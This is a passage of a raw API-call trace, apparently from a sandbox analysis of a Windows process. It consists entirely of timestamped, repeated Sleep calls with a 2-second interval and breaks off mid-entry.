[0259.577] Sleep (dwMilliseconds=0x7d0) [0259.578] Sleep (dwMilliseconds=0x7d0) [0259.584] Sleep (dwMilliseconds=0x7d0) [0259.585] Sleep (dwMilliseconds=0x7d0) [0259.606] Sleep (dwMilliseconds=0x7d0) [0259.613] Sleep (dwMilliseconds=0x7d0) [0259.614] Sleep (dwMilliseconds=0x7d0) [0259.616] Sleep (dwMilliseconds=0x7d0) [0259.621] Sleep (dwMilliseconds=0x7d0) [0259.628] Sleep (dwMilliseconds=0x7d0) [0259.629] Sleep (dwMilliseconds=0x7d0) [0259.636] Sleep (dwMilliseconds=0x7d0) [0259.637] Sleep (dwMilliseconds=0x7d0) [0259.643] Sleep (dwMilliseconds=0x7d0) [0259.652] Sleep (dwMilliseconds=0x7d0) [0259.659] Sleep (dwMilliseconds=0x7d0) [0259.661] Sleep (dwMilliseconds=0x7d0) [0259.673] Sleep (dwMilliseconds=0x7d0) [0259.682] Sleep (dwMilliseconds=0x7d0) [0259.683] Sleep (dwMilliseconds=0x7d0) [0259.691] Sleep (dwMilliseconds=0x7d0) [0259.693] Sleep (dwMilliseconds=0x7d0) [0259.700] Sleep (dwMilliseconds=0x7d0) [0259.702] Sleep (dwMilliseconds=0x7d0) [0259.706] Sleep (dwMilliseconds=0x7d0) [0259.715] Sleep (dwMilliseconds=0x7d0) [0259.723] Sleep (dwMilliseconds=0x7d0) [0259.724] Sleep (dwMilliseconds=0x7d0) [0259.730] Sleep (dwMilliseconds=0x7d0) [0259.732] Sleep (dwMilliseconds=0x7d0) [0259.739] Sleep (dwMilliseconds=0x7d0) [0259.745] Sleep (dwMilliseconds=0x7d0) [0259.747] Sleep (dwMilliseconds=0x7d0) [0259.751] Sleep (dwMilliseconds=0x7d0) [0259.753] Sleep (dwMilliseconds=0x7d0) [0259.755] Sleep (dwMilliseconds=0x7d0) [0259.761] Sleep (dwMilliseconds=0x7d0) [0259.762] Sleep (dwMilliseconds=0x7d0) [0259.769] Sleep (dwMilliseconds=0x7d0) [0259.770] Sleep (dwMilliseconds=0x7d0) [0259.777] Sleep (dwMilliseconds=0x7d0) [0259.778] Sleep (dwMilliseconds=0x7d0) [0259.785] Sleep (dwMilliseconds=0x7d0) [0259.786] Sleep (dwMilliseconds=0x7d0) [0259.795] Sleep (dwMilliseconds=0x7d0) [0259.799] Sleep (dwMilliseconds=0x7d0) [0259.803] Sleep (dwMilliseconds=0x7d0) [0259.804] Sleep (dwMilliseconds=0x7d0) [0259.811] Sleep (dwMilliseconds=0x7d0) [0259.812] Sleep (dwMilliseconds=0x7d0) [0259.821] Sleep (dwMilliseconds=0x7d0) [0259.828] Sleep (dwMilliseconds=0x7d0) [0259.830] Sleep (dwMilliseconds=0x7d0) [0259.835] Sleep (dwMilliseconds=0x7d0) [0259.836] Sleep (dwMilliseconds=0x7d0) [0259.842] Sleep (dwMilliseconds=0x7d0) [0259.843] Sleep (dwMilliseconds=0x7d0) [0259.850] Sleep (dwMilliseconds=0x7d0) [0259.851] Sleep (dwMilliseconds=0x7d0) [0259.857] Sleep (dwMilliseconds=0x7d0) [0259.858] Sleep (dwMilliseconds=0x7d0) [0259.867] Sleep (dwMilliseconds=0x7d0) [0259.876] Sleep (dwMilliseconds=0x7d0) [0259.883] Sleep (dwMilliseconds=0x7d0) [0259.888] Sleep (dwMilliseconds=0x7d0) [0259.892] Sleep (dwMilliseconds=0x7d0) [0259.893] Sleep (dwMilliseconds=0x7d0) [0259.900] Sleep (dwMilliseconds=0x7d0) [0259.901] Sleep (dwMilliseconds=0x7d0) [0259.908] Sleep (dwMilliseconds=0x7d0) [0259.915] Sleep (dwMilliseconds=0x7d0) [0259.916] Sleep (dwMilliseconds=0x7d0) [0259.923] Sleep (dwMilliseconds=0x7d0) [0259.930] Sleep (dwMilliseconds=0x7d0) [0259.932] Sleep (dwMilliseconds=0x7d0) [0259.933] Sleep (dwMilliseconds=0x7d0) [0259.937] Sleep (dwMilliseconds=0x7d0) [0259.938] Sleep (dwMilliseconds=0x7d0) [0259.945] Sleep (dwMilliseconds=0x7d0) [0259.946] Sleep (dwMilliseconds=0x7d0) [0259.953] Sleep (dwMilliseconds=0x7d0) [0259.954] Sleep (dwMilliseconds=0x7d0) [0259.961] Sleep (dwMilliseconds=0x7d0) [0259.971] Sleep (dwMilliseconds=0x7d0) [0259.972] Sleep (dwMilliseconds=0x7d0) [0259.979] Sleep (dwMilliseconds=0x7d0) [0259.982] Sleep (dwMilliseconds=0x7d0) [0259.991] Sleep (dwMilliseconds=0x7d0) [0259.992] Sleep (dwMilliseconds=0x7d0) [0260.000] Sleep (dwMilliseconds=0x7d0) [0260.008] Sleep (dwMilliseconds=0x7d0) [0260.010] Sleep (dwMilliseconds=0x7d0) [0260.017] Sleep (dwMilliseconds=0x7d0) [0260.024] Sleep (dwMilliseconds=0x7d0) [0260.027] Sleep (dwMilliseconds=0x7d0) [0260.029] Sleep (dwMilliseconds=0x7d0) [0260.037] Sleep (dwMilliseconds=0x7d0) [0260.046] Sleep (dwMilliseconds=0x7d0) [0260.047] Sleep (dwMilliseconds=0x7d0) [0260.059] Sleep (dwMilliseconds=0x7d0) [0260.060] Sleep (dwMilliseconds=0x7d0) [0260.068] Sleep (dwMilliseconds=0x7d0) [0260.070] Sleep (dwMilliseconds=0x7d0) [0260.073] Sleep (dwMilliseconds=0x7d0) [0260.079] Sleep (dwMilliseconds=0x7d0) [0260.090] Sleep (dwMilliseconds=0x7d0) [0260.099] Sleep (dwMilliseconds=0x7d0) [0260.100] Sleep (dwMilliseconds=0x7d0) [0260.108] Sleep (dwMilliseconds=0x7d0) [0260.109] Sleep (dwMilliseconds=0x7d0) [0260.117] Sleep (dwMilliseconds=0x7d0) [0260.118] Sleep (dwMilliseconds=0x7d0) [0260.125] Sleep (dwMilliseconds=0x7d0) [0260.134] Sleep (dwMilliseconds=0x7d0) [0260.136] Sleep (dwMilliseconds=0x7d0) [0260.143] Sleep (dwMilliseconds=0x7d0) [0260.144] Sleep (dwMilliseconds=0x7d0) [0260.152] Sleep (dwMilliseconds=0x7d0) [0260.153] Sleep (dwMilliseconds=0x7d0) [0260.161] Sleep (dwMilliseconds=0x7d0) [0260.162] Sleep (dwMilliseconds=0x7d0) [0260.171] Sleep (dwMilliseconds=0x7d0) [0260.173] Sleep (dwMilliseconds=0x7d0) [0260.182] Sleep (dwMilliseconds=0x7d0) [0260.184] Sleep (dwMilliseconds=0x7d0) [0260.192] Sleep (dwMilliseconds=0x7d0) [0260.194] Sleep (dwMilliseconds=0x7d0) [0260.202] Sleep (dwMilliseconds=0x7d0) [0260.208] Sleep (dwMilliseconds=0x7d0) [0260.211] Sleep (dwMilliseconds=0x7d0) [0260.216] Sleep (dwMilliseconds=0x7d0) [0260.218] Sleep (dwMilliseconds=0x7d0) [0260.228] Sleep (dwMilliseconds=0x7d0) [0260.229] Sleep (dwMilliseconds=0x7d0) [0260.239] Sleep (dwMilliseconds=0x7d0) [0260.249] Sleep (dwMilliseconds=0x7d0) [0260.250] Sleep (dwMilliseconds=0x7d0) [0260.257] Sleep (dwMilliseconds=0x7d0) [0260.259] Sleep (dwMilliseconds=0x7d0) [0260.260] Sleep (dwMilliseconds=0x7d0) [0260.268] Sleep (dwMilliseconds=0x7d0) [0260.269] Sleep (dwMilliseconds=0x7d0) [0260.297] Sleep (dwMilliseconds=0x7d0) [0260.303] Sleep (dwMilliseconds=0x7d0) [0260.304] Sleep (dwMilliseconds=0x7d0) [0260.313] Sleep (dwMilliseconds=0x7d0) [0260.321] Sleep (dwMilliseconds=0x7d0) [0260.332] Sleep (dwMilliseconds=0x7d0) [0260.334] Sleep (dwMilliseconds=0x7d0) [0260.342] Sleep (dwMilliseconds=0x7d0) [0260.344] Sleep (dwMilliseconds=0x7d0) [0260.362] Sleep (dwMilliseconds=0x7d0) [0260.371] Sleep (dwMilliseconds=0x7d0) [0260.372] Sleep (dwMilliseconds=0x7d0) [0260.380] Sleep (dwMilliseconds=0x7d0) [0260.381] Sleep (dwMilliseconds=0x7d0) [0260.388] Sleep (dwMilliseconds=0x7d0) [0260.396] Sleep (dwMilliseconds=0x7d0) [0260.399] Sleep (dwMilliseconds=0x7d0) [0260.401] Sleep (dwMilliseconds=0x7d0) [0260.416] Sleep (dwMilliseconds=0x7d0) [0260.428] Sleep (dwMilliseconds=0x7d0) [0260.436] Sleep (dwMilliseconds=0x7d0) [0260.438] Sleep (dwMilliseconds=0x7d0) [0260.446] Sleep (dwMilliseconds=0x7d0) [0260.447] Sleep (dwMilliseconds=0x7d0) [0260.450] Sleep (dwMilliseconds=0x7d0) [0260.456] Sleep (dwMilliseconds=0x7d0) [0260.458] Sleep (dwMilliseconds=0x7d0) [0260.465] Sleep (dwMilliseconds=0x7d0) [0260.467] Sleep (dwMilliseconds=0x7d0) [0260.476] Sleep (dwMilliseconds=0x7d0) [0260.484] Sleep (dwMilliseconds=0x7d0) [0260.495] Sleep (dwMilliseconds=0x7d0) [0260.496] Sleep (dwMilliseconds=0x7d0) [0260.504] Sleep (dwMilliseconds=0x7d0) [0260.505] Sleep (dwMilliseconds=0x7d0) [0260.514] Sleep (dwMilliseconds=0x7d0) [0260.516] Sleep (dwMilliseconds=0x7d0) [0260.525] Sleep (dwMilliseconds=0x7d0) [0260.527] Sleep (dwMilliseconds=0x7d0) [0260.535] Sleep (dwMilliseconds=0x7d0) [0260.539] Sleep (dwMilliseconds=0x7d0) [0260.543] Sleep (dwMilliseconds=0x7d0) [0260.544] Sleep (dwMilliseconds=0x7d0) [0260.552] Sleep (dwMilliseconds=0x7d0) [0260.566] Sleep (dwMilliseconds=0x7d0) [0260.567] Sleep (dwMilliseconds=0x7d0) [0260.573] Sleep (dwMilliseconds=0x7d0) [0260.574] Sleep (dwMilliseconds=0x7d0) [0260.580] Sleep (dwMilliseconds=0x7d0) [0260.581] Sleep (dwMilliseconds=0x7d0) [0260.586] Sleep (dwMilliseconds=0x7d0) [0260.607] Sleep (dwMilliseconds=0x7d0) [0260.614] Sleep (dwMilliseconds=0x7d0) [0260.615] Sleep (dwMilliseconds=0x7d0) [0260.621] Sleep (dwMilliseconds=0x7d0) [0260.622] Sleep (dwMilliseconds=0x7d0) [0260.627] Sleep (dwMilliseconds=0x7d0) [0260.628] Sleep (dwMilliseconds=0x7d0) [0260.634] Sleep (dwMilliseconds=0x7d0) [0260.635] Sleep (dwMilliseconds=0x7d0) [0260.641] Sleep (dwMilliseconds=0x7d0) [0260.642] Sleep (dwMilliseconds=0x7d0) [0260.644] Sleep (dwMilliseconds=0x7d0) [0260.648] Sleep (dwMilliseconds=0x7d0) [0260.649] Sleep (dwMilliseconds=0x7d0) [0260.655] Sleep (dwMilliseconds=0x7d0) [0260.656] Sleep (dwMilliseconds=0x7d0) [0260.661] Sleep (dwMilliseconds=0x7d0) [0260.663] Sleep (dwMilliseconds=0x7d0) [0260.669] Sleep (dwMilliseconds=0x7d0) [0260.676] Sleep (dwMilliseconds=0x7d0) [0260.680] Sleep (dwMilliseconds=0x7d0) [0260.686] Sleep (dwMilliseconds=0x7d0) [0260.687] Sleep (dwMilliseconds=0x7d0) [0260.691] Sleep (dwMilliseconds=0x7d0) [0260.693] Sleep (dwMilliseconds=0x7d0) [0260.694] Sleep (dwMilliseconds=0x7d0) [0260.700] Sleep (dwMilliseconds=0x7d0) [0260.708] Sleep (dwMilliseconds=0x7d0) [0260.714] Sleep (dwMilliseconds=0x7d0) [0260.715] Sleep (dwMilliseconds=0x7d0) [0260.720] Sleep (dwMilliseconds=0x7d0) [0260.722] Sleep (dwMilliseconds=0x7d0) [0260.729] Sleep (dwMilliseconds=0x7d0) [0260.730] Sleep (dwMilliseconds=0x7d0) [0260.735] Sleep (dwMilliseconds=0x7d0) [0260.737] Sleep (dwMilliseconds=0x7d0) [0260.744] Sleep (dwMilliseconds=0x7d0) [0260.751] Sleep (dwMilliseconds=0x7d0) [0260.752] Sleep (dwMilliseconds=0x7d0) [0260.758] Sleep (dwMilliseconds=0x7d0) [0260.759] Sleep (dwMilliseconds=0x7d0) [0260.764] Sleep (dwMilliseconds=0x7d0) [0260.765] Sleep (dwMilliseconds=0x7d0) [0260.771] Sleep (dwMilliseconds=0x7d0) [0260.778] Sleep (dwMilliseconds=0x7d0) [0260.779] Sleep (dwMilliseconds=0x7d0) [0260.782] Sleep (dwMilliseconds=0x7d0) [0260.785] Sleep (dwMilliseconds=0x7d0) [0260.792] Sleep (dwMilliseconds=0x7d0) [0260.800] Sleep (dwMilliseconds=0x7d0) [0260.801] Sleep (dwMilliseconds=0x7d0) [0260.808] Sleep (dwMilliseconds=0x7d0) [0260.814] Sleep (dwMilliseconds=0x7d0) [0260.815] Sleep (dwMilliseconds=0x7d0) [0260.822] Sleep (dwMilliseconds=0x7d0) [0260.823] Sleep (dwMilliseconds=0x7d0) [0260.865] Sleep (dwMilliseconds=0x7d0) [0260.870] Sleep (dwMilliseconds=0x7d0) [0260.876] Sleep (dwMilliseconds=0x7d0) [0260.878] Sleep (dwMilliseconds=0x7d0) [0260.883] Sleep (dwMilliseconds=0x7d0) [0260.885] Sleep (dwMilliseconds=0x7d0) [0260.891] Sleep (dwMilliseconds=0x7d0) [0260.892] Sleep (dwMilliseconds=0x7d0) [0260.898] Sleep (dwMilliseconds=0x7d0) [0260.899] Sleep (dwMilliseconds=0x7d0) [0260.905] Sleep (dwMilliseconds=0x7d0) [0260.912] Sleep (dwMilliseconds=0x7d0) [0260.914] Sleep (dwMilliseconds=0x7d0) [0260.915] Sleep (dwMilliseconds=0x7d0) [0260.922] Sleep (dwMilliseconds=0x7d0) [0260.930] Sleep (dwMilliseconds=0x7d0) [0260.936] Sleep (dwMilliseconds=0x7d0) [0260.938] Sleep (dwMilliseconds=0x7d0) [0260.943] Sleep (dwMilliseconds=0x7d0) [0260.945] Sleep (dwMilliseconds=0x7d0) [0260.952] Sleep (dwMilliseconds=0x7d0) [0260.953] Sleep (dwMilliseconds=0x7d0) [0260.962] Sleep (dwMilliseconds=0x7d0) [0260.966] Sleep (dwMilliseconds=0x7d0) [0260.968] Sleep (dwMilliseconds=0x7d0) [0260.974] Sleep (dwMilliseconds=0x7d0) [0260.975] Sleep (dwMilliseconds=0x7d0) [0260.982] Sleep (dwMilliseconds=0x7d0) [0260.984] Sleep (dwMilliseconds=0x7d0) [0260.991] Sleep (dwMilliseconds=0x7d0) [0260.993] Sleep (dwMilliseconds=0x7d0) [0261.002] Sleep (dwMilliseconds=0x7d0) [0261.003] Sleep (dwMilliseconds=0x7d0) [0261.007] Sleep (dwMilliseconds=0x7d0) [0261.013] Sleep (dwMilliseconds=0x7d0) [0261.021] Sleep (dwMilliseconds=0x7d0) [0261.029] Sleep (dwMilliseconds=0x7d0) [0261.038] Sleep (dwMilliseconds=0x7d0) [0261.039] Sleep (dwMilliseconds=0x7d0) [0261.044] Sleep (dwMilliseconds=0x7d0) [0261.050] Sleep (dwMilliseconds=0x7d0) [0261.052] Sleep (dwMilliseconds=0x7d0) [0261.057] Sleep (dwMilliseconds=0x7d0) [0261.063] Sleep (dwMilliseconds=0x7d0) [0261.064] Sleep (dwMilliseconds=0x7d0) [0261.070] Sleep (dwMilliseconds=0x7d0) [0261.071] Sleep (dwMilliseconds=0x7d0) [0261.077] Sleep (dwMilliseconds=0x7d0) [0261.078] Sleep (dwMilliseconds=0x7d0) [0261.083] Sleep (dwMilliseconds=0x7d0) [0261.090] Sleep (dwMilliseconds=0x7d0) [0261.091] Sleep (dwMilliseconds=0x7d0) [0261.096] Sleep (dwMilliseconds=0x7d0) [0261.098] Sleep (dwMilliseconds=0x7d0) [0261.106] Sleep (dwMilliseconds=0x7d0) [0261.107] Sleep (dwMilliseconds=0x7d0) [0261.113] Sleep (dwMilliseconds=0x7d0) [0261.120] Sleep (dwMilliseconds=0x7d0) [0261.121] Sleep (dwMilliseconds=0x7d0) [0261.128] Sleep (dwMilliseconds=0x7d0) [0261.129] Sleep (dwMilliseconds=0x7d0) [0261.135] Sleep (dwMilliseconds=0x7d0) [0261.136] Sleep (dwMilliseconds=0x7d0) [0261.140] Sleep (dwMilliseconds=0x7d0) [0261.142] Sleep (dwMilliseconds=0x7d0) [0261.149] Sleep (dwMilliseconds=0x7d0) [0261.150] Sleep (dwMilliseconds=0x7d0) [0261.156] Sleep (dwMilliseconds=0x7d0) [0261.157] Sleep (dwMilliseconds=0x7d0) [0261.163] Sleep (dwMilliseconds=0x7d0) [0261.164] Sleep (dwMilliseconds=0x7d0) [0261.169] Sleep (dwMilliseconds=0x7d0) [0261.176] Sleep (dwMilliseconds=0x7d0) [0261.183] Sleep (dwMilliseconds=0x7d0) [0261.184] Sleep (dwMilliseconds=0x7d0) [0261.191] Sleep (dwMilliseconds=0x7d0) [0261.200] Sleep (dwMilliseconds=0x7d0) [0261.208] Sleep (dwMilliseconds=0x7d0) [0261.209] Sleep (dwMilliseconds=0x7d0) [0261.239] Sleep (dwMilliseconds=0x7d0) [0261.320] Sleep (dwMilliseconds=0x7d0) [0261.340] Sleep (dwMilliseconds=0x7d0) [0261.343] Sleep (dwMilliseconds=0x7d0) [0261.346] Sleep (dwMilliseconds=0x7d0) [0261.347] Sleep (dwMilliseconds=0x7d0) [0261.361] Sleep (dwMilliseconds=0x7d0) [0261.362] Sleep (dwMilliseconds=0x7d0) [0261.368] Sleep (dwMilliseconds=0x7d0) [0261.369] Sleep (dwMilliseconds=0x7d0) [0261.376] Sleep (dwMilliseconds=0x7d0) [0261.382] Sleep (dwMilliseconds=0x7d0) [0261.383] Sleep (dwMilliseconds=0x7d0) [0261.393] Sleep (dwMilliseconds=0x7d0) [0261.394] Sleep (dwMilliseconds=0x7d0) [0261.398] Sleep (dwMilliseconds=0x7d0) [0261.404] Sleep (dwMilliseconds=0x7d0) [0261.414] Sleep (dwMilliseconds=0x7d0) [0261.426] Sleep (dwMilliseconds=0x7d0) [0261.436] Sleep (dwMilliseconds=0x7d0) [0261.437] Sleep (dwMilliseconds=0x7d0) [0261.442] Sleep (dwMilliseconds=0x7d0) [0261.446] Sleep (dwMilliseconds=0x7d0) [0261.456] Sleep (dwMilliseconds=0x7d0) [0261.466] Sleep (dwMilliseconds=0x7d0) [0261.467] Sleep (dwMilliseconds=0x7d0) [0261.476] Sleep (dwMilliseconds=0x7d0) [0261.478] Sleep (dwMilliseconds=0x7d0) [0261.487] Sleep (dwMilliseconds=0x7d0) [0261.488] Sleep (dwMilliseconds=0x7d0) [0261.498] Sleep (dwMilliseconds=0x7d0) [0261.499] Sleep (dwMilliseconds=0x7d0) [0261.511] Sleep (dwMilliseconds=0x7d0) [0261.522] Sleep (dwMilliseconds=0x7d0) [0261.524] Sleep (dwMilliseconds=0x7d0) [0261.532] Sleep (dwMilliseconds=0x7d0) [0261.533] Sleep (dwMilliseconds=0x7d0) [0261.543] Sleep (dwMilliseconds=0x7d0) [0261.544] Sleep (dwMilliseconds=0x7d0) [0261.553] Sleep (dwMilliseconds=0x7d0) [0261.554] Sleep (dwMilliseconds=0x7d0) [0261.564] Sleep (dwMilliseconds=0x7d0) [0261.565] Sleep (dwMilliseconds=0x7d0) [0261.574] Sleep (dwMilliseconds=0x7d0) [0261.575] Sleep (dwMilliseconds=0x7d0) [0261.579] Sleep (dwMilliseconds=0x7d0) [0261.585] Sleep (dwMilliseconds=0x7d0) [0261.586] Sleep (dwMilliseconds=0x7d0) [0261.615] Sleep (dwMilliseconds=0x7d0) [0261.617] Sleep (dwMilliseconds=0x7d0) [0261.626] Sleep (dwMilliseconds=0x7d0) [0261.628] Sleep (dwMilliseconds=0x7d0) [0261.636] Sleep (dwMilliseconds=0x7d0) [0261.643] Sleep (dwMilliseconds=0x7d0) [0261.646] Sleep (dwMilliseconds=0x7d0) [0261.655] Sleep (dwMilliseconds=0x7d0) [0261.664] Sleep (dwMilliseconds=0x7d0) [0261.665] Sleep (dwMilliseconds=0x7d0) [0261.675] Sleep (dwMilliseconds=0x7d0) [0261.683] Sleep (dwMilliseconds=0x7d0) [0261.684] Sleep (dwMilliseconds=0x7d0) [0261.688] Sleep (dwMilliseconds=0x7d0) [0261.694] Sleep (dwMilliseconds=0x7d0) [0261.695] Sleep (dwMilliseconds=0x7d0) [0261.704] Sleep (dwMilliseconds=0x7d0) [0261.713] Sleep (dwMilliseconds=0x7d0) [0261.725] Sleep (dwMilliseconds=0x7d0) [0261.727] Sleep (dwMilliseconds=0x7d0) [0261.731] Sleep (dwMilliseconds=0x7d0) [0261.736] Sleep (dwMilliseconds=0x7d0) [0261.738] Sleep (dwMilliseconds=0x7d0) [0261.746] Sleep (dwMilliseconds=0x7d0) [0261.748] Sleep (dwMilliseconds=0x7d0) [0261.756] Sleep (dwMilliseconds=0x7d0) [0261.765] Sleep (dwMilliseconds=0x7d0) [0261.774] Sleep (dwMilliseconds=0x7d0) [0261.775] Sleep (dwMilliseconds=0x7d0) [0261.785] Sleep (dwMilliseconds=0x7d0) [0261.792] Sleep (dwMilliseconds=0x7d0) [0261.827] Sleep (dwMilliseconds=0x7d0) [0261.836] Sleep (dwMilliseconds=0x7d0) [0261.843] Sleep (dwMilliseconds=0x7d0) [0261.846] Sleep (dwMilliseconds=0x7d0) [0261.847] Sleep (dwMilliseconds=0x7d0) [0261.855] Sleep (dwMilliseconds=0x7d0) [0261.863] Sleep (dwMilliseconds=0x7d0) [0261.870] Sleep (dwMilliseconds=0x7d0) [0261.872] Sleep (dwMilliseconds=0x7d0) [0261.877] Sleep (dwMilliseconds=0x7d0) [0261.879] Sleep (dwMilliseconds=0x7d0) [0261.885] Sleep (dwMilliseconds=0x7d0) [0261.892] Sleep (dwMilliseconds=0x7d0) [0261.894] Sleep (dwMilliseconds=0x7d0) [0261.899] Sleep (dwMilliseconds=0x7d0) [0261.900] Sleep (dwMilliseconds=0x7d0) [0261.906] Sleep (dwMilliseconds=0x7d0) [0261.908] Sleep (dwMilliseconds=0x7d0) [0261.912] Sleep (dwMilliseconds=0x7d0) [0261.914] Sleep (dwMilliseconds=0x7d0) [0261.921] Sleep (dwMilliseconds=0x7d0) [0261.927] Sleep (dwMilliseconds=0x7d0) [0261.928] Sleep (dwMilliseconds=0x7d0) [0261.932] Sleep (dwMilliseconds=0x7d0) [0261.934] Sleep (dwMilliseconds=0x7d0) [0261.935] Sleep (dwMilliseconds=0x7d0) [0261.940] Sleep (dwMilliseconds=0x7d0) [0261.942] Sleep (dwMilliseconds=0x7d0) [0261.946] Sleep (dwMilliseconds=0x7d0) [0261.953] Sleep (dwMilliseconds=0x7d0) [0261.954] Sleep (dwMilliseconds=0x7d0) [0261.959] Sleep (dwMilliseconds=0x7d0) [0261.960] Sleep (dwMilliseconds=0x7d0) [0261.965] Sleep (dwMilliseconds=0x7d0) [0261.971] Sleep (dwMilliseconds=0x7d0) [0261.972] Sleep (dwMilliseconds=0x7d0) [0261.977] Sleep (dwMilliseconds=0x7d0) [0261.978] Sleep (dwMilliseconds=0x7d0) [0261.983] Sleep (dwMilliseconds=0x7d0) [0261.984] Sleep (dwMilliseconds=0x7d0) [0261.989] Sleep (dwMilliseconds=0x7d0) [0261.990] Sleep (dwMilliseconds=0x7d0) [0261.995] Sleep (dwMilliseconds=0x7d0) [0261.997] Sleep (dwMilliseconds=0x7d0) [0262.003] Sleep (dwMilliseconds=0x7d0) [0262.010] Sleep (dwMilliseconds=0x7d0) [0262.012] Sleep (dwMilliseconds=0x7d0) [0262.018] Sleep (dwMilliseconds=0x7d0) [0262.056] Sleep (dwMilliseconds=0x7d0) [0262.062] Sleep (dwMilliseconds=0x7d0) [0262.071] Sleep (dwMilliseconds=0x7d0) [0262.072] Sleep (dwMilliseconds=0x7d0) [0262.080] Sleep (dwMilliseconds=0x7d0) [0262.082] Sleep (dwMilliseconds=0x7d0) [0262.090] Sleep (dwMilliseconds=0x7d0) [0262.101] Sleep (dwMilliseconds=0x7d0) [0262.112] Sleep (dwMilliseconds=0x7d0) [0262.114] Sleep (dwMilliseconds=0x7d0) [0262.125] Sleep (dwMilliseconds=0x7d0) [0262.126] Sleep (dwMilliseconds=0x7d0) [0262.135] Sleep (dwMilliseconds=0x7d0) [0262.136] Sleep (dwMilliseconds=0x7d0) [0262.145] Sleep (dwMilliseconds=0x7d0) [0262.147] Sleep (dwMilliseconds=0x7d0) [0262.155] Sleep (dwMilliseconds=0x7d0) [0262.157] Sleep (dwMilliseconds=0x7d0) [0262.166] Sleep (dwMilliseconds=0x7d0) [0262.176] Sleep (dwMilliseconds=0x7d0) [0262.185] Sleep (dwMilliseconds=0x7d0) [0262.195] Sleep (dwMilliseconds=0x7d0) [0262.199] Sleep (dwMilliseconds=0x7d0) [0262.205] Sleep (dwMilliseconds=0x7d0) [0262.207] Sleep (dwMilliseconds=0x7d0) [0262.214] Sleep (dwMilliseconds=0x7d0) [0262.222] Sleep (dwMilliseconds=0x7d0) [0262.225] Sleep (dwMilliseconds=0x7d0) [0262.234] Sleep (dwMilliseconds=0x7d0) [0262.243] Sleep (dwMilliseconds=0x7d0) [0262.246] Sleep (dwMilliseconds=0x7d0) [0262.255] Sleep (dwMilliseconds=0x7d0) [0262.257] Sleep (dwMilliseconds=0x7d0) [0262.265] Sleep (dwMilliseconds=0x7d0) [0262.271] Sleep (dwMilliseconds=0x7d0) [0262.279] Sleep (dwMilliseconds=0x7d0) [0262.281] Sleep (dwMilliseconds=0x7d0) [0262.291] Sleep (dwMilliseconds=0x7d0) [0262.298] Sleep (dwMilliseconds=0x7d0) [0262.300] Sleep (dwMilliseconds=0x7d0) [0262.307] Sleep (dwMilliseconds=0x7d0) [0262.311] Sleep (dwMilliseconds=0x7d0) [0262.318] Sleep (dwMilliseconds=0x7d0) [0262.321] Sleep (dwMilliseconds=0x7d0) [0262.331] Sleep (dwMilliseconds=0x7d0) [0262.332] Sleep (dwMilliseconds=0x7d0) [0262.339] Sleep (dwMilliseconds=0x7d0) [0262.345] Sleep (dwMilliseconds=0x7d0) [0262.363] Sleep (dwMilliseconds=0x7d0) [0262.376] Sleep (dwMilliseconds=0x7d0) [0262.387] Sleep (dwMilliseconds=0x7d0) [0262.397] Sleep (dwMilliseconds=0x7d0) [0262.398] Sleep (dwMilliseconds=0x7d0) [0262.407] Sleep (dwMilliseconds=0x7d0) [0262.414] Sleep (dwMilliseconds=0x7d0) [0262.419] Sleep (dwMilliseconds=0x7d0) [0262.427] Sleep (dwMilliseconds=0x7d0) [0262.428] Sleep (dwMilliseconds=0x7d0) [0262.436] Sleep (dwMilliseconds=0x7d0) [0262.443] Sleep (dwMilliseconds=0x7d0) [0262.444] Sleep (dwMilliseconds=0x7d0) [0262.451] Sleep (dwMilliseconds=0x7d0) [0262.452] Sleep (dwMilliseconds=0x7d0) [0262.458] Sleep (dwMilliseconds=0x7d0) [0262.460] Sleep (dwMilliseconds=0x7d0) [0262.461] Sleep (dwMilliseconds=0x7d0) [0262.469] Sleep (dwMilliseconds=0x7d0) [0262.471] Sleep (dwMilliseconds=0x7d0) [0262.477] Sleep (dwMilliseconds=0x7d0) [0262.495] Sleep (dwMilliseconds=0x7d0) [0262.496] Sleep (dwMilliseconds=0x7d0) [0262.503] Sleep (dwMilliseconds=0x7d0) [0262.505] Sleep (dwMilliseconds=0x7d0) [0262.507] Sleep (dwMilliseconds=0x7d0) [0262.512] Sleep (dwMilliseconds=0x7d0) [0262.514] Sleep (dwMilliseconds=0x7d0) [0262.520] Sleep (dwMilliseconds=0x7d0) [0262.529] Sleep (dwMilliseconds=0x7d0) [0262.530] Sleep (dwMilliseconds=0x7d0) [0262.538] Sleep (dwMilliseconds=0x7d0) [0262.539] Sleep (dwMilliseconds=0x7d0) [0262.546] Sleep (dwMilliseconds=0x7d0) [0262.547] Sleep (dwMilliseconds=0x7d0) [0262.551] Sleep (dwMilliseconds=0x7d0) [0262.554] Sleep (dwMilliseconds=0x7d0) [0262.555] Sleep (dwMilliseconds=0x7d0) [0262.565] Sleep (dwMilliseconds=0x7d0) [0262.567] Sleep (dwMilliseconds=0x7d0) [0262.574] Sleep (dwMilliseconds=0x7d0) [0262.576] Sleep (dwMilliseconds=0x7d0) [0262.582] Sleep (dwMilliseconds=0x7d0) [0262.588] Sleep (dwMilliseconds=0x7d0) [0262.605] Sleep (dwMilliseconds=0x7d0) [0262.611] Sleep (dwMilliseconds=0x7d0) [0262.618] Sleep (dwMilliseconds=0x7d0) [0262.625] Sleep (dwMilliseconds=0x7d0) [0262.627] Sleep (dwMilliseconds=0x7d0) [0262.632] Sleep (dwMilliseconds=0x7d0) [0262.640] Sleep (dwMilliseconds=0x7d0) [0262.647] Sleep (dwMilliseconds=0x7d0) [0262.648] Sleep (dwMilliseconds=0x7d0) [0262.654] Sleep (dwMilliseconds=0x7d0) [0262.656] Sleep (dwMilliseconds=0x7d0) [0262.661] Sleep (dwMilliseconds=0x7d0) [0262.662] Sleep (dwMilliseconds=0x7d0) [0262.668] Sleep (dwMilliseconds=0x7d0) [0262.675] Sleep (dwMilliseconds=0x7d0) [0262.682] Sleep (dwMilliseconds=0x7d0) [0262.683] Sleep (dwMilliseconds=0x7d0) [0262.689] Sleep (dwMilliseconds=0x7d0) [0262.691] Sleep (dwMilliseconds=0x7d0) [0262.696] Sleep (dwMilliseconds=0x7d0) [0262.698] Sleep (dwMilliseconds=0x7d0) [0262.700] Sleep (dwMilliseconds=0x7d0) [0262.704] Sleep (dwMilliseconds=0x7d0) [0262.705] Sleep (dwMilliseconds=0x7d0) [0262.711] Sleep (dwMilliseconds=0x7d0) [0262.718] Sleep (dwMilliseconds=0x7d0) [0262.719] Sleep (dwMilliseconds=0x7d0) [0262.725] Sleep (dwMilliseconds=0x7d0) [0262.732] Sleep (dwMilliseconds=0x7d0) [0262.752] Sleep 